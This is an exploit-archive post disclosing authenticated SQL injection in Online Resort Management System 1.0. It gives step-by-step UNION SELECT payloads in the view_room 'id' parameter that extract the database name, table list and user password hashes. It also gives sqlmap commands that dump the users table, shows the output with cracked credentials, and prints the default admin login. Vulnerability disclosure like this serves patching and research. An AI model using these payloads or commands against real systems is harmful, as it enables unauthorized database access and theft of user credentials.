Online Resort Management System 1.0 SQL Injection

Online Resort Management System 1.0 SQL Injection: Posted Jan 18, 2022; Authored by Gaurav Grover; Online Resort Management System version 1.0 suffer from remote SQL injection vulnerabilities. Original discovery of SQL injection in this version is attributed to nu11secur1ty on January 10, 2022.; tags | exploit, remote, vulnerability, sql injection; SHA-256 | f901ac18d938c659dcced1597954fd5ccffb4c0483b3801ffa54b94294b3451b; Download | Favorite | View

Online Resort Management System 1.0 SQL Injection

# Exploit Title: Online Resort Management System 1.0 - SQLi (Authenticated)
# Date: 15/01/2022
# Exploit Author: Gaurav Grover
# Vendor Homepage: <http://192.168.0.108/orms/admin/login.php>
# Software Link: <https://www.sourcecodester.com/php/15126/online-resort-management-system-using-phpoop-free-source-code.html>
# Version: 1.0
# Tested on: Linux and windows both

Summary:

There are a vulnerabilities in Online Resort Management System (ORMS)
1. The attacker can easily retrieved the database using sql injection.

Proof of concepts :


Database dump Manualy using SQL Injection, SQL Query & Users detaile are mentioned below:

1. After login with the admin credentials(Username : admin / Password : admin123) there is a vulnerable parameter name is id=


2. Found SQL Injection Parameter :- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2%27order%20by%2010--+


3. http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,2,3,4,5,6,7,8,9,10--+


4. (Database Name :- orms_db)

    Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,database(),3,4,5,6,7,8,9,10--+


5. (Table Name :- activity_list,message_list,reservation_list,room_list,system_info,users

    Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),3,4,5,6,7,8,9,10--+


6. (Username Password :-  User-1 admin / 0192023a7bbd73250516f069df18b500 , User-2 cblake / 1cd74fae0a3adf459f73bbf187607ccea

    Query:- http://192.168.0.108/orms/admin/?page=rooms/view_room&id=-2%27union%20select%201,(select%20group_concat(username,password)%20from%20users),3,4,5,6,7,8,9,10--+


-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

Database dump Automated using Sqlmap Tool, SQL Query & Users detaile are mentioned below:



1. Database Name:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -dbs

available databases [8]:

[*] clinic_db
[*] information_schema
[*] mtms_db
[*] mysql
[*] orms_db
[*] performance_schema
[*] phpmyadmin
[*] test


2- Dump the tables using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db --tables

Database: mtms
[6 tables]
+------------------+
| activity_list    |
| message_list     |
| reservation_list |
| room_list        |
| system_info      |
| users            |
+------------------+



3- Dump the database using this SQL Query:- sqlmap.py -u "http://192.168.0.108/orms/admin/?page=rooms/view_room&id=2" --batch -D orms_db -T users --dump

Database: orms_db
Table: users
[2 entries]
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| id | type | status | avatar                            | username | lastname | password                                    | firstname    | middlename | last_login | date_added          | date_updated        |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+
| 1  | 1    | 1      | uploads/avatar-1.png?v=1639468007 | admin    | Admin    | 0192023a7bbd73250516f069df18b500 (admin123) | Adminstrator | NULL       | NULL       | 2021-01-20 14:02:37 | 2021-12-14 15:47:08 |
| 5  | 2    | 1      | uploads/avatar-5.png?v=1641622906 | cblake1  | Blake    | cd74fae0a3adf459f73bbf187607ccea (cblake)   | Claire       | NULL       | NULL       | 2022-01-08 14:21:46 | 2022-01-15 14:01:28 |
+----+------+--------+-----------------------------------+----------+----------+---------------------------------------------+--------------+------------+------------+---------------------+---------------------+

Top Authors In Last 30 Days

Red Hat 272 files
Ubuntu 60 files
Debian 19 files
Gentoo 8 files
Apple 5 files
Google Security Research 4 files
Jann Horn 3 files
Spencer McIntyre 3 files
LiquidWorm 3 files
Pierre Kim 2 files

File Archives

Systems

AIX (430)
Apple (2,132)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,172)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,607)
HPUX (881)
iOS (395)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (52,112)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,459)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (10,018)
UNIX (9,482)
UnixWare (188)
Windows (6,785)
Other

Online Resort Management System 1.0 SQL Injection

Online Resort Management System 1.0 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Online Resort Management System 1.0 SQL Injection

Share This

Online Resort Management System 1.0 SQL Injection

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems